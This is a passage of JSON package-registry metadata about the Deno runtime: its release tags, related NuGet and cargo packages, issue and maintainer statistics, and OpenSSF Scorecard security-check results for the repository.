_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T02:36:47.155Z","dependent_packages_count":0,"downloads":null,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":56.27430155413802,"dependent_repos_count":6.2280896497958045,"dependent_packages_count":16.636613922702708,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":26.37966837554551},"purl":"pkg:nuget/ytdlp.deno.runtime","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nuget/ytdlp.deno.runtime","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nuget/ytdlp.deno.runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nuget/ytdlp.deno.runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages/ytdlp.deno.runtime/codemeta","maintainers":[{"uuid":"manuhub","login":"manuhub","name":null,"email":null,"url":null,"packages_count":26,"html_url":"https://www.nuget.org/profiles/manuhub","role":null,"created_at":"2026-02-15T13:51:16.378Z","updated_at":"2026-02-15T13:51:16.378Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/maintainers/manuhub/packages"}],"registry":{"name":"nuget.org","url":"https://www.nuget.org","ecosystem":"nuget","default":true,"packages_count":849839,"maintainers_count":114963,"namespaces_count":0,"keywords_count":175953,"github":"nuget","metadata":{"funded_packages_count":33284,"rate_limit":2},"icon_url":"https://github.com/nuget.png","created_at":"2022-04-04T15:19:23.147Z","updated_at":"2026-09-04T05:04:03.539Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nuget.org/namespaces"}},{"id":11067587,"name":"lib_deno_resolver","ecosystem":"cargo","description":"Deno resolution algorithm","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2024-11-20T17:58:35.293Z","latest_release_published_at":"2024-11-20T18:30:13.364Z","latest_release_number":"0.11.0","last_synced_at":"2026-09-07T22:55:08.445Z","created_at":"2024-11-20T18:01:14.547Z","updated_at":"2026-09-07T22:55:08.445Z","registry_url":"https://crates.io/crates/lib_deno_resolver/","install_command":"cargo install lib_deno_resolver","documentation_url":"https://docs.rs/lib_deno_resolver/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using 